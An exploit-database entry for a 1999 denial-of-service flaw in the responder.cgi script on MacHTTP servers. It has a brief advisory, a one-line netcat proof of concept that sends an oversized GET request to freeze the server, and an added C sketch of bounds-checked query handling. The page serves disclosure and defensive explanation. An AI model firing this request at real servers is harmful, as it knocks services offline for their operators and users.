Exploit John O'Fallon Responder.cgi 1.0 - Denial of Service

Exploiter

Hacker
18 Dec 2022
EDB-ID: 21048
EDB verification: Passed
Author: EPIC
Vulnerability type: DOS
Platform: CGI
CVE: null
Publication date: 1999-04-09
Code:
source: https://www.securityfocus.com/bid/3155/info

'responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products.

It is possible to cause a denial of service to MacHTTP webserver due to improper bounds checking in the script 'responder.cgi'. HTTP GET requests with an excessive number of characters will cause the server to freeze.

The webserver will need to be restarted to regain normal functionality. 

$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80
 
Source
www.exploit-db.com
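
The advisory attributes the freeze to improper bounds checking on the GET query. As an added illustration (not the source of responder.cgi, which the page does not show), the C sketch below puts the unchecked copy pattern beside a length-checked one that rejects an overlong query instead of copying it. QUERY_MAX, copy_query and status_for are hypothetical names, and the 256-byte limit is an assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define QUERY_MAX 256   /* assumed buffer size; the real script's size is not on the page */

/* Unchecked pattern (hypothetical, shown for contrast only):
 *     char buf[QUERY_MAX];
 *     strcpy(buf, getenv("QUERY_STRING"));   // no length check, NULL not handled
 */

/* Checked copy: 0 on success, -1 if the query is missing, -2 if it does not fit.
 * dst is always NUL-terminated when dstsize > 0. */
int copy_query(char *dst, size_t dstsize, const char *query)
{
    const char *end;

    if (dst == NULL || dstsize == 0)
        return -1;
    dst[0] = '\0';
    if (query == NULL)
        return -1;
    /* Look for the terminator within dstsize bytes only; never scan further. */
    end = memchr(query, '\0', dstsize);
    if (end == NULL)
        return -2;                              /* too long: reject, do not truncate */
    memcpy(dst, query, (size_t)(end - query) + 1);
    return 0;
}

/* HTTP status a CGI would report for this query string. */
int status_for(const char *query)
{
    char buf[QUERY_MAX];

    switch (copy_query(buf, sizeof buf, query)) {
    case 0:  return 200;
    case -2: return 414;                        /* URI Too Long */
    default: return 400;
    }
}

int main(void)
{
    int status = status_for(getenv("QUERY_STRING"));

    printf("Status: %d\r\nContent-Type: text/plain\r\n\r\n", status);
    puts(status == 200 ? "ok" : "request rejected");
    return 0;
}
```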
